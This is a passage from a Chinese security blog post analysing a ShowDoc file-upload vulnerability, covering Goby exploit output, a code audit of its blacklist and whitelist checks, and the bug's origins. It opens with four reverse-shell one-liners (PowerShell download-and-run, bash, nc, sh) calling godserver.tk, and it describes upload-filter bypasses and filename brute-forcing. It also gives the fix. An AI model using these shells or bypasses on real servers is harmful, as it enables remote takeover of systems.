<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs jsx"><span class="hljs-comment">//Goby生成的godserver相关命令</span><br><span class="hljs-comment">//ReverseTCPByPowershell</span><br>powershell IEX (New-<span class="hljs-built_in">Object</span> Net.WebClient).DownloadString(<span class="hljs-string">&#x27;http://godserver.tk/ps/rs.ps1&#x27;</span>);rs -H godserver.tk -P <span class="hljs-number">35355</span><br><span class="hljs-comment">//ReverseTCPByBash</span><br>bash -i &gt;&amp; <span class="hljs-regexp">/dev/</span>tcp/godserver.tk/<span class="hljs-number">35355</span> <span class="hljs-number">0</span>&gt;&amp;<span class="hljs-number">1</span><br><span class="hljs-comment">//ReverseTCPByNcBsd</span><br>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|<span class="hljs-regexp">/bin/</span>sh -i <span class="hljs-number">2</span>&gt;&amp;<span class="hljs-number">1</span>|nc godserver.tk <span class="hljs-number">35355</span> &gt;<span class="hljs-regexp">/tmp/</span>f<br><span class="hljs-comment">//ReverseTCPBySh</span><br><span class="hljs-number">0</span>&lt;&amp;<span class="hljs-number">1</span>-;exec <span class="hljs-number">1</span>&lt;&gt;<span class="hljs-regexp">/dev/</span>tcp/godserver.tk/<span class="hljs-number">35355</span>;sh -i &lt;&amp;<span class="hljs-number">1</span> &gt;&amp;<span class="hljs-number">1</span> <span class="hljs-number">2</span>&gt;&amp;<span class="hljs-number">1</span><br></code></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%209.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%2010.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="3-3-最终效果"><a href="#3-3-最终效果" class="headerlink" title="3.3 最终效果"></a>3.3 最终效果</h2><p>代码放在仓库：<a target="_blank" rel="noopener" href="https://github.com/corp0ra1/showDocDemo">https://github.com/corp0ra1/showDocDemo</a></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled.gif" srcset="/img/loading.gif" lazyload></p>
<h2 id="3-4-发散思维"><a href="#3-4-发散思维" class="headerlink" title="3.4 发散思维"></a>3.4 发散思维</h2><p>上述操作基本把Goby提供的功能基本都尝试了个遍，就剩下个DNSLOG也尝试一下？比如第二次请求之后不通过返回值判断而是根据DNSLOG的结果？</p>
<h1 id="4-更进一步-代码审计-TL-DR"><a href="#4-更进一步-代码审计-TL-DR" class="headerlink" title="4. 更进一步-代码审计 TL;DR"></a>4. 更进一步-代码审计 TL;DR</h1><p>上述操作只是完成了漏洞的复现，以及POC&amp;EXP的编写，但是心中还是有疑问</p>
<ul>
<li>为什么文件名后缀使用<code>.&lt;&gt;php</code>就可以绕过?</li>
<li>为什么我尝试<code>.&lt;php</code>的后缀绕过方式不行？</li>
<li>为什么有这种神奇的绕过方法？</li>
<li>什么原因导致的？</li>
</ul>
<p>十万个为什么，最终促使了我进行代码审计！</p>
<blockquote>
<p>不会代码审计，只能一步步的断点跟踪分析，笨办法</p>
</blockquote>
<h2 id="4-1-showdoc如何限制文件上传的"><a href="#4-1-showdoc如何限制文件上传的" class="headerlink" title="4.1 showdoc如何限制文件上传的"></a>4.1 showdoc如何限制文件上传的</h2><h3 id="4-1-1-先黑名单检测"><a href="#4-1-1-先黑名单检测" class="headerlink" title="4.1.1 先黑名单检测"></a>4.1.1 先黑名单检测</h3><p>检测文件名中是否包含php字样</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">strstr(strtolower(<span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;editormd-image-file&#x27;</span>][<span class="hljs-string">&#x27;name&#x27;</span>]), <span class="hljs-string">&quot;.php&quot;</span>)<br></code></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%2011.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="4-1-2-再白名单检测"><a href="#4-1-2-再白名单检测" class="headerlink" title="4.1.2 再白名单检测"></a>4.1.2 再白名单检测</h3><p>检测文件后缀名是否在upload类的<code>$ext</code>数组白名单中。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">return</span> <span class="hljs-keyword">empty</span>(<span class="hljs-keyword">$this</span>-&gt;config[<span class="hljs-string">&#x27;exts&#x27;</span>]) ? <span class="hljs-literal">true</span> : in_array(strtolower(<span class="hljs-variable">$ext</span>), <span class="hljs-keyword">$this</span>-&gt;exts);<br></code></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%2012.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="4-1-3-最后图片内容检测"><a href="#4-1-3-最后图片内容检测" class="headerlink" title="4.1.3 最后图片内容检测"></a>4.1.3 最后图片内容检测</h3><p>仅对图像文件进行进一步检测，其他类型则放行（有些鸡肋）</p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%2013.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="4-2-绕过方法一：畸形后缀绕过"><a href="#4-2-绕过方法一：畸形后缀绕过" class="headerlink" title="4.2 绕过方法一：畸形后缀绕过"></a>4.2 绕过方法一：畸形后缀绕过</h2><h3 id="4-2-1-绕过方式"><a href="#4-2-1-绕过方式" class="headerlink" title="4.2.1 绕过方式"></a>4.2.1 绕过方式</h3><p>文件名为：<code>test.&lt;&gt;php</code></p>
<h3 id="4-2-2-原理"><a href="#4-2-2-原理" class="headerlink" title="4.2.2 原理"></a>4.2.2 原理</h3><p><code>.&lt;&gt;php</code>的方式绕过了黑名单对<code>.php</code>检测</p>
<p>而在之后的showdoc\server\ThinkPHP\Library\Think\Upload.class.php 的<code>upload()</code>函数中对文件名使用了<code>strip_tags()</code>函数进行处理，去掉了<code>&lt;&gt;</code>标签，还原后缀名为php。</p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%2014.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="4-2-3-修复方案"><a href="#4-2-3-修复方案" class="headerlink" title="4.2.3 修复方案"></a>4.2.3 修复方案</h3><p>在进行黑名单检测时，先用<code>strip_tags()</code>函数对输入文件名进行处理（有趣的是我在另外一个路径下的同名文件中发现了这种修复方案）：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//漏洞版本：showdoc\server\Application\Home\Controller\PageController.class.php</span><br><br>strstr(strtolower(<span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;editormd-image-file&#x27;</span>][<span class="hljs-string">&#x27;name&#x27;</span>]), <span class="hljs-string">&quot;.php&quot;</span>)<br><br><span class="hljs-comment">//另外一个路径下的修复版本：showdoc\server\Application\Api\Controller\PageController.class.php</span><br><br>strstr(strip_tags(strtolower(<span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;editormd-image-file&#x27;</span>][<span class="hljs-string">&#x27;name&#x27;</span>])), <span class="hljs-string">&quot;.php&quot;</span>) <br></code></pre></td></tr></table></figure>

<h3 id="4-2-4-追问：不是后面还会进行白名单检测吗？"><a href="#4-2-4-追问：不是后面还会进行白名单检测吗？" class="headerlink" title="4.2.4 追问：不是后面还会进行白名单检测吗？"></a>4.2.4 追问：不是后面还会进行白名单检测吗？</h3><blockquote>
<p>重头戏，这个引发后续一系列问题！</p>
</blockquote>
<p>虽然前面绕过了黑名单检测，但是后面还有白名单检测，那么这里怎么绕过的呢？</p>
<p>赋值问题：后缀的白名单数组赋值给了upload类中的<code>allowExts</code>变量：<code>$upload-&gt;allowExts = array(&#39;jpg&#39;, &#39;gif&#39;, &#39;png&#39;, &#39;jpeg&#39;);</code> ，但是检测文件名后缀的时候使用upload类中的<code>exts</code>变量：<code>$this-&gt;config[&#39;exts&#39;]</code> ，错付了值，显而易见，exts变量为空，故绕过了后缀名的check。</p>
<p>这是开发者在开发时疏漏导致的白名单检测缺陷，将<code>$upload-&gt;allowExts= array(&#39;jpg&#39;, &#39;gif&#39;, &#39;png&#39;, &#39;jpeg&#39;);</code>对应代码更改为<code>$upload-&gt;exts= array(&#39;jpg&#39;, &#39;gif&#39;, &#39;png&#39;, &#39;jpeg&#39;);</code> 即可修复</p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%2015.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="4-3-绕过方法二：修改输入名称"><a href="#4-3-绕过方法二：修改输入名称" class="headerlink" title="4.3 绕过方法二：修改输入名称"></a>4.3 绕过方法二：修改输入名称</h2><h3 id="4-3-1-绕过方式"><a href="#4-3-1-绕过方式" class="headerlink" title="4.3.1 绕过方式"></a>4.3.1 绕过方式</h3><p>将文件输入名称改为<code>editormd-image-file1</code>，如  <code>name=&quot;editormd-image-file1&quot;; filename=&quot;test.php&quot;</code> </p>
<h3 id="4-3-2-原理"><a href="#4-3-2-原理" class="headerlink" title="4.3.2 原理"></a>4.3.2 原理</h3><p>因为他只检测输入名为<code>editormd-image-file</code> 文件的文件名是否包含php，修改对应的输入名即可。通过此方式同样绕过了黑名单的检测，结合白名单的缺陷，以实现目的</p>
<p><strong>举一反三</strong>：这也解释了为什么其他场景的文件上传中可以通过修改这个字段名称的方式绕过了文件上传限制</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">strstr(strtolower(<span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;editormd-image-file&#x27;</span>][<span class="hljs-string">&#x27;name&#x27;</span>]), <span class="hljs-string">&quot;.php&quot;</span>)<br></code></pre></td></tr></table></figure>

<h3 id="4-3-3-缺陷"><a href="#4-3-3-缺陷" class="headerlink" title="4.3.3 缺陷"></a>4.3.3 缺陷</h3><p>虽然在文件夹中看到文件成功上传，但是返回的文件路径中没有文件名</p>
<p>查看源码后发现：是因为在返回的文件名中又一次使用到了<code>editormd-image-file</code> ，并通过这个名来获取文件保存路径。由于我们更改了输入名，并不存在<code>editormd-image-file</code> 的键值，故返回了文件名为空。</p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%2016.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%2017.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="4-3-4-进一步绕过"><a href="#4-3-4-进一步绕过" class="headerlink" title="4.3.4 进一步绕过"></a>4.3.4 进一步绕过</h3><p>虽然没有返回文件名，但是文件是上传成功的，那么如何知道上传后的文件名？</p>
<p>跟踪源码，发现文件命名调用了<code>uniqid()</code> 函数，而该函数的定义是基于以微秒计的当前时间，生成一个唯一的 ID。根据函数的定义，那么在极短的时间内发送两个包，那么文件名应该是相近的。</p>
<p>方法一：第一个正常上传返回路径，第二个修改输入名不返回路径，依据时间递增遍历即可找到，但是爆破不知上限有些盲目。</p>
<p>方法二：php文件在两个包之间，对应文件名也在两个包时间之间。如下图，需要爆破5位数</p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%2018.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="4-3-5-更进一步"><a href="#4-3-5-更进一步" class="headerlink" title="4.3.5 更进一步"></a>4.3.5 更进一步</h3><p>通过查看<a target="_blank" rel="noopener" href="http://document.thinkphp.cn/manual_3_2.html#upload">thinkphp文档</a>后发现，其支持多文件上传。测试后多文件上传后，发现文件处理时间间隔更近，命名更相似，3位数，对应爆破次数不超过4000次，效率更高。</p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%2019.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="4-4-官方修复方案"><a href="#4-4-官方修复方案" class="headerlink" title="4.4 官方修复方案"></a>4.4 官方修复方案</h2><p>修复白名单赋值导致的缺陷即可，将<code>$upload-&gt;allowExts= array(&#39;jpg&#39;, &#39;gif&#39;, &#39;png&#39;, &#39;jpeg&#39;);</code>对应代码更改为<code>$upload-&gt;exts= array(&#39;jpg&#39;, &#39;gif&#39;, &#39;png&#39;, &#39;jpeg&#39;);</code></p>
<p><a target="_blank" rel="noopener" href="https://github.com/star7th/showdoc/commit/189b6cedc011a0d2758f4207cb85c565372093dd">https://github.com/star7th/showdoc/commit/189b6cedc011a0d2758f4207cb85c565372093dd</a></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%2020.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="4-5-其他失败尝试"><a href="#4-5-其他失败尝试" class="headerlink" title="4.5 其他失败尝试"></a>4.5 其他失败尝试</h2><h3 id="4-5-1-直接上传php"><a href="#4-5-1-直接上传php" class="headerlink" title="4.5.1 直接上传php"></a>4.5.1 直接上传php</h3><p><strong>原因</strong>：最早跟踪&lt;&gt;的漏洞成因，发现是白名单后缀检测失效导致的，既然白名单失效，为什么不考虑直接上传php</p>
<p><strong>过程</strong>：测试失败，然后下断点跟踪代码。</p>
<p><strong>收获</strong>：发现了其还有一层黑名单验证机制</p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%2021.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="4-5-2-strlower通过Unicode字符绕过"><a href="#4-5-2-strlower通过Unicode字符绕过" class="headerlink" title="4.5.2 strlower通过Unicode字符绕过"></a>4.5.2 strlower通过Unicode字符绕过</h3><p>原因：最近打<a target="_blank" rel="noopener" href="https://blog.csdn.net/wanmiqi/article/details/117044715">CISCN2021</a>的一道upload题目，遇到在<code>strtolower</code> 进行黑名单匹配时可通过unicode绕过</p>
<p><strong>过程</strong>：仔细查看后发现我记错了，CTF中题目是<code>mb_strtolowe</code>r，而此处是<code>strtolower</code></p>
<p><strong>收获</strong>：对<code>strtolower</code>和<code>mb_strtolower</code>理解更深</p>
<h3 id="4-5-3-htaccess绕过"><a href="#4-5-3-htaccess绕过" class="headerlink" title="4.5.3 .htaccess绕过"></a>4.5.3 .htaccess绕过</h3><p><strong>背景</strong>：黑名单只限制php，phtml可以上传，但无法被解析，那么可以上传<code>.htaccess</code>使之支持解析吗？</p>
<p><strong>过程</strong>：测试，发现上传的<code>.htaccess</code> 会被重命名为<code>60d150f6ee711.htaccess</code></p>
<p><strong>结局</strong>：不再发散，点到为止</p>
<h1 id="5-有趣的溯源"><a href="#5-有趣的溯源" class="headerlink" title="5. 有趣的溯源"></a>5. 有趣的溯源</h1><h2 id="5-1-漏洞起源于CTF"><a href="#5-1-漏洞起源于CTF" class="headerlink" title="5.1 漏洞起源于CTF"></a>5.1 漏洞起源于CTF</h2><ol>
<li>plzmyy师傅最早通报这个漏洞给<a target="_blank" rel="noopener" href="https://github.com/star7th/showdoc/pull/1059%E3%80%82">showdoc官方</a>在2020年的八月</li>
<li>plzmyy师傅提到了最早出现在RoarCTF2019的赛事中的simple_upload题目<a target="_blank" rel="noopener" href="https://www.fuzzer.xyz/2019/10/14/RoarCTF2019">Ethan师傅的WP</a></li>
<li>Ethan师傅发现&lt;&gt;绕过方法是fuzz出来这个非预期解，而查看绝大部分WP以及<a target="_blank" rel="noopener" href="https://github.com/berTrAM888/RoarCTF-Writeup-some-Source-Code/tree/master/Web/simple_upload/writeup">疑似官方的WP</a>中介绍的是利用uniqid()的函数可爆破的点，似乎没注意到这个非预期解。</li>
<li>Ethan师傅文章中提到疑似0day，引起了我的兴趣，我想分析到底是哪个day？</li>
</ol>
<h2 id="5-2-疑似0day"><a href="#5-2-疑似0day" class="headerlink" title="5.2 疑似0day"></a>5.2 疑似0day</h2><ol>
<li>检索相关关键词，没有发现0day，而且到现在都没有爆出来，离谱！更加吸引了我的兴趣</li>
<li>搜索引擎限定搜索时间为19年10月RoarCTF开赛之前，发现一个14的<a target="_blank" rel="noopener" href="https://www.jb51.net/article/54209.htm">《ThinkPHP文件上传实例教程》</a>一个15年的<a target="_blank" rel="noopener" href="http://www.splaybow.com/post/thinkphp-file-upload-sample.html">《ThinkPHP文件上传的实例代码》</a>网页介绍了如何使用ThinkPHP文件上传 ，其使用的方法就是<code>$upload-&gt;allowExts</code>错误的写法，而ThinkPHP官方3.2版本的<a target="_blank" rel="noopener" href="http://document.thinkphp.cn/manual_3_2.html#upload">说明文档</a>中则使用的是正确的<code>$upload-&gt;exts</code>写法</li>
<li>那么为什么ThinkPHP官方是对的，而民间大家用的是这种错误的写法？会不会是官方早期版本教学用的就是这个错误的写法？</li>
</ol>
<h2 id="5-3-官方自相矛盾吗"><a href="#5-3-官方自相矛盾吗" class="headerlink" title="5.3 官方自相矛盾吗"></a>5.3 官方自相矛盾吗</h2><ol>
<li>怀疑是ThinkPHP3.2以下版本的官方文档自身用了错误的写法，而民间只是历史沿用这一用法，搜了<a target="_blank" rel="noopener" href="http://www.thinkphp.cn/info/194.html">ThinkPHP3.1的说明文档</a>，果不其然用的就是<code>$upload-&gt;allowExts</code> 的错误方式</li>
<li>那么TP3.2官方为什么在文档中更正TP3.1中的错误的写法？是因为当时爆出了漏洞吗？遗憾的是检索后发现TP3.1并没有爆出这类漏洞</li>
<li>继续追踪，查看3.1和3.2官方源码发现：是在TP从3.1到3.2版本升级的时候，由于编写文件上传类的负责人换了<code>liu21st</code>→<code>zuojiazi</code>，使得①类名<code>UploadFile()</code> →<code>Upload()</code>②白名单后缀数组名<code>allowExts</code> → <code>ext</code>③文件名，文件路径等发生变更。</li>
<li>仔细对比3.1和3.2的文档，发现虽然源码发生改变，但对应的教学文档也发生了相应的改变，本质上并不存在漏洞。</li>
<li>也就说①3.1版本的源码配合3.1的文档，<code>$upload = new UploadFile()</code>搭配<code>$upload-&gt;allowExts</code>不会产生漏洞；②3.2版本的源码配合3.2的文档，<code>$upload = new \Think\Upload()</code>搭配<code>$upload-&gt;exts</code>也不会发生漏洞。③但是3.2的版本使用3.1的文档，<code>$upload = new \Think\Upload()</code>搭配<code>$upload-&gt;allowExts</code>就会产生漏洞，而showdoc的漏洞成因很大几率来源于此。</li>
<li>再次百度、Google相关教程网页，发现民间教程也都和官方文档一样，一一对应（刚刚只关注键名的不同没关注类名的不同，误会民间教程了）。</li>
<li>也就说官方教程不存在问题，网上教程也不存在问题，如showdoc官方案例这种错赋值的写法并未检索到，那么只能是个人了！</li>
</ol>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%2022.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%2023.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="5-4-大结局：个人问题"><a href="#5-4-大结局：个人问题" class="headerlink" title="5.4 大结局：个人问题"></a>5.4 大结局：个人问题</h2><ol>
<li>真的是个人问题吗？</li>
<li>再往前追：2016年8月showdocV1.0.0版本就存在<a target="_blank" rel="noopener" href="https://github.com/star7th/showdoc/blob/v1.0.0/Application/Home/Controller/PageController.class.php">这种错误的写法</a>，但是14年TP3.2就出现了</li>
<li>由于两个作品发布前后间隔两年，首先怀疑作者是基于一个通用模板或CMS改的，但是检索了半天开源框架并没有发现类似案例。</li>
<li>其次只能怀疑是面向百度编程的通病：①百度内容②发现官网文档③发现demo，但是运行失败③魔改一番，手动将类名由uploadfile改为upload⑤程序运行成功⑥不影响正常业务⑦大功告成！</li>
<li>我按照这个步骤复现之后发现很类似，最后和作者取得联系，和怀疑的基本差不多。</li>
</ol>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%2024.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%2025.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="5-5-时间线"><a href="#5-5-时间线" class="headerlink" title="5.5 时间线"></a>5.5 时间线</h2><p>2013年06月07日：ThinkPHP3.1.3发布，使用<code>UploadFile()-&gt;allowExts</code></p>
<p>2014年02月03日：ThinkPHP3.2 发布，使用<code>Upload()-&gt;exts</code></p>
<p>2016年08月07日：showdocV1.0.0发布 ，使用<code>UploadFile()-&gt;exts</code> </p>
<p>2019年10月12日：RoarCTF开赛，并于14日Ethan师傅Fuzz出了这个点，但其未深究</p>
<p>2020年08月12日：plzmyy师傅根据Ethan师傅的WP发现showDoc的漏洞</p>
<h2 id="5-6-总结"><a href="#5-6-总结" class="headerlink" title="5.6 总结"></a>5.6 总结</h2><p>溯源到最后，可以说showdoc是个特例，是由于开发者的一时疏忽导致的。诚然在这个里面个人开发者占很大的问题，但也希望给厂商企业敲响一个警钟，在版本升级时不仅要注意文档和代码的对应性，也需要在更改类的字段名时候慎重考虑。</p>
<p>对于Ethan师傅也有点可惜，他觉得是个0day，但未深究跟踪一下代码，也许他就真的发现了一个0day。</p>
<p>对于CTFer来说，也需要多看WP，也许能收获到不同的东西</p>
<p>对于面向百度编程的我，也需要警惕不要做一个盲目CV的代码首席移动工程师。</p>
<h1 id="6-大总结"><a href="#6-大总结" class="headerlink" title="6. 大总结"></a>6. 大总结</h1><p>一个文件上传1day的POC编写，从简单的GUI编写，不满足于是选择用Go语言编写，再到逐个使用Goby自带API优化POC，最终实现一键反弹shell。不仅学习了Go，也对EXP进一步的完善。</p>
<p>代码审计，从一个为什么产生出发，不断地问自己问题，虽然是一次简单的代审，延伸出一次溯源，最后的收获远不止一次代码审计，不可思议的是我的总结居然升华到了人。</p>
<p>正如Zwell说的“不断问自己问题”的学习方法，随着不停的问自己问题，记录下问题解决它，好奇心吸引着我，最后到了一个新的高度，共勉！</p>

                            </div>
                            
                                <p class="note note-info">
                                    
                                                    本文最后更新于：
                                                        2021年6月25日 凌晨
                                                            
                                </p>
                                
                                    <hr>
                                    <div>
                                        <div class="post-metas mb-3">
                                            
                                                <div class="post-meta mr-3">
                                                    <i class="iconfont icon-category"></i>
                                                    
                                                        <a class="hover-with-bg" href="/categories/%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/">
                                                            漏洞研究
                                                        </a>
                                                        
                                                </div>
                                                
                                                    
                                                        <div class="post-meta">
                                                            <i class="iconfont icon-tags"></i>
                                                            
                                                                <a class="hover-with-bg" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">
                                                                    漏洞复现
                                                                </a>
                                                                
                                                                <a class="hover-with-bg" href="/tags/POC%E7%BC%96%E5%86%99/">
                                                                    POC编写
                                                                </a>
                                                                
                                                                <a class="hover-with-bg" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">
                                                                    代码审计
                                                                </a>
                                                                
                                                        </div>
                                                        
                                        </div>
                                        
                                            <p class="note note-warning">
                                                
                                                            本博客所有文章欢迎转载 ，但希望转载时能注明出处！ </br>关于文章，如有疑问，欢迎讨论！Email:corp0ra1@qq.com </br>如果图片无法显示:https://corp0ra1.github.io/common/imageLoad.html
                                                                
                                            </p>
                                            
                                                
                                                    <div class="post-prevnext">
                                                        <article class="post-prev col-6">
                                                            
                                                                
                                                        </article>
                                                        <article class="post-next col-6">
                                                            
                                                                
                                                        </article>
                                                    </div>
                                                    
                                    </div>

                                    
                        </article>
                    </div>
                </div>
            </div>
            
                <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
                    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

                </div>
                
        </div>
    </div>

    <!-- Custom -->
    
    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <div> <div class="copyright">©2020 - 2021 By Corp0ra1</div> </div> <div> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> &nbsp;|&nbsp; <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> &nbsp;|&nbsp; <a href="https://github.com/jsdelivr/jsdelivr" target="_blank" rel="nofollow noopener"><span>jsDelivr</span></a> </div> 
  </div>
  <!--添加运行时间-->
<div id="sitetime"></div>
<script language=javascript>
    function siteTime() {
